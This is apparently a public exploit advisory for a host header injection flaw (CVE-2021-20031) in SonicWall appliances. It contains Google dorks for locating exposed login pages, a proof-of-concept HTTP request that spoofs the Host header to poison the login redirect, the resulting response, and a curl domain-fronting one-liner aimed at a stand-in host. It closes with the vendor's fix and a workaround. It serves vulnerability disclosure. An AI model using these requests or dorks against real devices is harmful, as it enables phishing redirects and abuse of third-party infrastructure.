# Exploit Title: Sonicwall SonicOS 7.0 - Host Header Injection
# Google Dork: inurl:"auth.html" intitle:"SonicWall"
# intitle:"SonicWall Analyzer Login"
# Discovered Date: 03/09/2020
# Reported Date: 07/09/2020
# Exploit Author: Ramikan
# Vendor Homepage:sonicwall.com
# Affected Devices: All SonicWall Next Gen 6 Devices
# Tested On: SonicWall NAS 6.2.5
# Affected Version: All SonicWall Next Gen 6 Devices till 6.5.3
# Fixed Version:Gen6 firmware 6.5.4.8-89n
# CVE : CVE-2021-20031
# CVSS v3:5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
# Category:Hardware, Web Apps
# Reference : https://github.com/Ramikan/Vulnerabilities/
*************************************************************************************************************************************
Vulnerability 1: Host Header Injection
*************************************************************************************************************************************
Description:
A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages.
An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack
Impact:
Host Header changed to different domain (fakedomain.com).
Fakedomain.com can be found in two lines in the HTTP response, below are the two lines.
var jumpURL = "https://fakedomain.com/auth.html";
ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>
*************************************************************************************************************************************
Normal Request
*************************************************************************************************************************************
GET / HTTP/1.1
Host: 192.168.10.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
*************************************************************************************************************************************
Normal Response
*************************************************************************************************************************************
HTTP/1.0 200 OK
Server: SonicWALL
Expires: -1
Cache-Control: no-cache
Content-type: text/html; charset=UTF-8;
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
++++++++++++++++++snipped+++++++++++++++++++++++
</head>
<body class="login_bg">
<div class="login_outer">
<div class="login_inner">
<div class="vgap48"></div>
<div class="login_logo">
<img src="logo_sw.png">
</div>
<div class="login_prodname">
Network Security Appliance
</div>
<div class="vgap48"></div>
<div class="login_msg_header">
Please be patient as you are being re-directed to <a href="https://192.168.10.1/auth.html" target="_top">a secure login page</a>
</div>
<div class="vgap24"></div>
</div>
</div>
</body>
</html>
*************************************************************************************************************************************
POC
*************************************************************************************************************************************
Host Header changed to different domain (fakedomain.com).
Fakedomain.com can be found in two lines in the response, below are the two lines.
var jumpURL = "https://fakedomain.com/auth.html";
ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>
*************************************************************************************************************************************
Request:
*************************************************************************************************************************************
GET / HTTP/1.1
Host: fakedomain.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Upgrade-Insecure-Requests: 1
Connection: close
Cookie: temp=
*************************************************************************************************************************************
Response:
*************************************************************************************************************************************
HTTP/1.0 200 OK
Server: SonicWALL
Expires: -1
Cache-Control: no-cache
Content-type: text/html; charset=UTF-8;
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Type" content="text/html">
<title>Document Moved</title>
<meta name="id" content="docJump" >
<link rel=stylesheet href="swl_styles-6.2.5-2464327966.css" TYPE="text/css">
<link rel=stylesheet href="swl_login-6.2.5-2193764341.css" TYPE="text/css">
<script type="text/JavaScript">
var resetSecureFlag = false;
setTimeout("goJump();", 1000);
function goJump() {
var jumpURL = "https://fakedomain.com/auth.html";
var jumpProt = jumpURL.substr(0,6).toLowerCase();
var ix;
if (jumpProt.substr(0,4) == "http" && (ix = jumpProt.indexOf(":")) != -1) {
jumpProt = jumpProt.substr(0,ix+1);
if (location.protocol.toLowerCase() != jumpProt) {
window.opener = null;
top.opener = null;
}
}
if (resetSecureFlag) {
var sessId = getCookie("SessId");
var pageSeed = swlStore.get("PageSeed", {isGlobal: true});
if (sessId) { setCookieExt("SessId", sessId, { strictSameSite: true }); }
if (pageSeed) { swlStore.set("PageSeed", pageSeed, {isGlobal: true}); }
}
top.location.href = jumpURL;
}
function setCookie(key, value) {
var argv = setCookie.arguments;
var argc = setCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = key + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}
function getCookie(key) {
if (document.cookie.length) {
var cookies = ' ' + document.cookie;
var start = cookies.indexOf(' ' + key + '=');
if (start == -1) {
return null;
}
var end = cookies.indexOf(";", start);
if (end == -1) {
end = cookies.length;
}
end -= start;
var cookie = cookies.substr(start,end);
return unescape(cookie.substr(cookie.indexOf('=') + 1, cookie.length - cookie.indexOf('=') + 1));
} else {
return null;
}
}
</script>
</head>
<body class="login_bg">
<div class="login_outer">
<div class="login_inner">
<div class="vgap48"></div>
<div class="login_logo">
<img src="logo_sw.png">
</div>
<div class="login_prodname">
Network Security Appliance
</div>
<div class="vgap48"></div>
<div class="login_msg_header">
Please be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>
</div>
<div class="vgap24"></div>
</div>
</div>
</body>
</html>
The redirection is happening to https://fakedomain.com/auth.html.
*************************************************************************************************************************************
Attack Vector:
*************************************************************************************************************************************
Can be used for domain fronting.
curl -k --header "Host: attack.host.net" "Domain Name of the Sonicwall device"
*************************************************************************************************************************************
Vendor Response:
*************************************************************************************************************************************
Fix: SonicWall has fixed the issue in Gen6 firmware 6.5.4.8-89n (build is available in mysonicwall.com) - fix is provided with a CLI option > configure > administration > enforce-http-host-check, to avoid Host header redirection.
Workaround: Please disable port 80 to mitigate it and this issue affected all Gen6 firewall products.
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019
*************************************************************************************************************************************